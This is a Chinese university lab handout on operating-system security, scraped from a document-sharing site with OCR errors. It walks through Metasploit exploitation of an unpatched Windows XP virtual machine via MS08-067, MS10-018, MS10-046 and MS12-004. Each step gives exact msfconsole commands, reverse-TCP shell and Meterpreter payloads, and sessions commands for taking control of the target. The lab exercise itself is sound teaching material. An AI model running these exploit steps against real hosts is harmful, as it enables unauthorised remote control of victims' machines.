版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、-. z.计算机系统平安 实验二:操作系统平安与metasploit渗透测试实验目的:学习计算机操作系统平安相关容。学习操作系统渗透相关容学习metasploit渗透工具使用。实验原理:Windows 操作系统平安构造网络渗透原理实验环境:软件: vmware 8.0环境下,虚拟机, vm-Win*P镜像虚拟机,backtrack 4及backtrack 5 虚拟机镜像 等。实验拓扑:被渗透机: 使用虚拟机*P,建议使用未安装更新的英文*P操作系统, 设置其IP地址为,自动获得,虚拟机网络连接方式 NAT方式。实验室计算机network系统下中network_vm 目录中有metasploit
2、able_*P,可使用之。渗透测试机: 使用Bt4或5作为操作系统,准备工作:启动两台虚拟机,按上图方式设置,请先记录下两台虚拟机的IP:被渗透机:操作系统:_windows *p with sp1_IP地址: 渗透测试机:操作系统:_bt5_IP地址:(注意,假设网络连接未启用,请先启用之,linu* 下可使用ifup eth0)实验容:第一局部:针对操作系统部效劳端口进展渗透了解ms08-067漏洞详情:请课后上网查询相关容漏洞描述:曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC效劳漏洞造成的,MS08-067远程溢出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于W
3、indows系统中RPC存在缺陷造成的,Windows系统的Server效劳在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。漏洞对象:受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows *P /2000/Vista/2003等。除Windows Server 2008 Core外,根本上所有的Windows系统都会遭受此漏洞的攻击,特
4、别是在Windows 2000、Windows *P和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此平安漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进展大规模的攻击。漏洞端口:_445_步骤一:启动metasploit 控制台msfconsole记录其步骤二:搜索模块 ms08-067号模块search ms08-067找到模块,记录其名称,级别,描述步骤三:使用这个模块use windows/smb/ms08_067_netapi步骤四:查找有用的payload
5、sshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: RPORT ,SMBPIPE 有些没有 RHOST 发现payload所需要参数,有些有默认参数: E*ITFUNC ,LPORT 有些没有 : LHOST 渗透的目标设置值 : 0 步骤七:设置参数set RHOST *.*.*.* 被渗透主机的IP地址set LHOST *.*.*.*渗透测试主机的IP地址。步骤八:show
6、options 查看当前参数设置是否齐全。步骤九:show targets 查看当前攻击的目标。0 假设有,则表示可进展自动选择攻击。其他,则为特定选择特定系统。步骤十:参数齐全,目标选定,渗透载荷准备就绪,然后实施。e*ploit渗透开场。自动创立一shell (命令提示符使用ipconfig 及dir等命令确定当前控制的计算机是哪台。 翻开放大镜:步骤十一:E*it 然后再e*it退出。第二局部:针对操作系统下的浏览器进展渗透步骤一:浏览器漏洞MS10-018了解ms10-018漏洞详情:请课后上网查询相关容漏洞描述: 在提交数据时Internet E*plorer处理使用特制编码字符串的
7、容的方式存在信息泄露漏洞。攻击者可以通过创立特制的网页来利用这个漏洞,如果用户查看了该网页就会导致信息泄露。成功利用这个漏洞的攻击者可以查看本地计算机或其他域或Internet E*plorer区中的其他浏览器窗口的容。漏洞对象:Microsoft_Internet_E*plorer_7.0 Microsoft_Internet_E*plorer_6.0_SP1 Microsoft_Internet_E*plorer_6.0 Microsoft _Internet _E*plorer _5.0.1_ SP4漏洞端口: 8080 步骤一:启动metasploit 控制台msfconsole步骤二
8、:搜索模块 ms10-018号模块search ms10-018找到模块,记录其名称,级别,描述步骤三:使用这个模块use windows/browser/ms10_018_ie_behaviors步骤四:查找有用的payloadsshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: SRVHOST,SRVPORT,SSL,SSLVersion 有些没有 : URIPATH 发现pay
9、load所需要参数,有些有默认参数: E*ITFUNC,LPORT 有些没有 : LHOST 步骤七:设置SRVHOST 和LHOST 都设置为渗透测试机 IPset SRVHOST *.*.*.*set LHOST *.*.*.*target 可设置为 0渗透准备e*ploit 则列出一URL如:using url : htpp:/*.*.*.*:8080/qte30235fs暂时渗透到此(注意其中的qte30235fs为自动产生)在当对方机器 使用htpp:/*.*.*.*:8080/qte30235fs时,sessions产生使用sessions 来获知sessionsessions -
10、i 1直接将session 转到shell中创立一shell (命令提示符使用ipconfig 及dir等命令确定当前控制的计算机是哪台翻开写字板:第三局部:针对操作系统下类似快捷方式使用进展渗透步骤一:浏览器漏洞MS10-046了解ms10-046漏洞详情:请课后上网查询相关容漏洞描述:Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有一样的效果。Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地 或远程文件系统、光驱或其他位置,
11、使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能,因此 在连接可移动设备如USB闪存后Windows会自动翻开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。漏洞对象:Microsoft Windows *P SP3Microsoft Windows *P SP2Microsoft WindowsVistaSP2Microsoft WindowsVistaSP1Microsoft Windows Server 2008Microsoft Windows Server 2008 SP2Microsoft Windows Se
12、rver 2008 R2Microsoft Windows Server 2003 SP2Microsoft Windows 7漏洞端口:_80_步骤一:启动metasploit 控制台msfconsole步骤二:搜索模块 ms10-046号模块search ms10-046找到模块,记录其名称,级别,描述步骤三:使用这个模块use windows/browser/ms10_046_shortcut_icon_dllloader步骤四:查找有用的payloadsshow payloads步骤五:使用其中最常用的一个payloadset payload windows/shell/reverse
13、_tcp步骤六:查看当前的这个payload 以及攻击所需要的参数选项show options发现模块所需要选项,有些有默认参数: SRVPORT ,SRVHOST ,URIPATH 有些没有 UNCHOST 发现payload所需要参数,有些有默认参数: E*ITFUNC ,LPORT 有些没有 : LHOST 步骤七:设置SRVHOST 和LHOST 都设置为渗透测试机 IPset SRVHOST *.*.*.*set LHOST *.*.*.*设置浏览的URLset URIPATH hzs.html (其中hzs 为你的的首字母)target 可设置为 0渗透准备e*ploit 报错,说
14、明URIPATH不能改动,需要改回默认值重新e*ploit则列出一URL如:using url : htpp:/*.*.*.*:8080/hzs.html暂时渗透到此在当对方机器 使用如:using url : htpp:/*.*.*.*:8080/hzs.html时,sessions产生使用sessions 来获知sessionsessions -i 1直接将session 转到shell中创立一shell (命令提示符使用ipconfig 及dir等命令确定当前控制的计算机是哪台翻开任务管理器:使用taskmgr命令*第四局部:渗透时使用meterpreter工具。浏览器漏洞MS12-00
15、4Windows Media Player是系统的多媒体播放组件。WMP在处理畸形构造的MIDI数据时存在存破坏漏洞,远程攻击者可能利用此漏洞通过诱使用户访问恶意网页控制用户系统。受影响系统:Microsoft Windows *P ProfessionalMicrosoft Windows *P Home EditionMicrosoft Windows VistaMicrosoft Windows Storage Server 2003Microsoft Windows Server 2008Microsoft Windows Server 2003 Web EditionMicrosof
16、t Windows Server 2003 Standard EditionMicrosoft Windows Server 2003 Enterprise EditionMicrosoft Windows Server 2003 Datacenter EditionMicrosoft Windows 7启动msfconsolesearch ms12_004搜索不到该模块得到相关结果为windows/browser/ms12_004_midi使用它use windows/browser/ms12_004_midi查看 payloadsshow payloadsset payload windo
17、ws/meterpreter/reverse_tcp查看相关的选项optionsshow options有SRVHOST SRVPORT SSL及SSL version为模块的参数有E*ITFUNC和LHOST 及LPORT作为payload的参数。还有target 设置设置SRVHOST 和LHOST 都设置为本地IPset SRVHOST *.*.*.*set LHOST *.*.*.*target 可设置为 0set URLPATH certsrv.html渗透准备e*ploit 则列出一URL如:using *.*.*.*:8080/certsrv.html暂时渗透到此在当对方机器 使用*.*.*.*:8080
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 工程项目承揽建设股权合作协议(居间协议)
- 工程图纸基础(名词、符号、代号大全)
- 2.1.2大气运动(热力环流)课件高中地理鲁教版(2019)必修一
- 13书面表达分类精练-2022-2023学年八年级英语下学期期末复习培优拔高(牛津译林版)(原卷版)
- 2024年黄冈客车上岗证模拟考试
- 2024年唐山客运从业资格证考试模拟考试
- 2024年标准版续租租房合同范本
- 2024年郑州客运从业资格证模拟考试题库下载
- 2024年南充客运资格证考试内客
- 2024年民间融资居间合同样本
- 附表 电力服务(涉电维护、检测等)收费项目及标准
- 《矿山机械设备》复习题
- 焊接工艺设计方案
- 中国古代楼阁PPT课件
- 二手车旧机动车评估图文实例及交易注意事项珍贵教材PPT课件
- 公司“师带徒”实施方案
- 管02酸洗、钝化记录
- 《内科护理学》病例分析(完整版)
- 低压有源滤波柜订货技术文件
- 全国中学生物理竞赛纯电阻电路的简化和等效变换
- 5GQoS管理机制介绍
评论
0/150
提交评论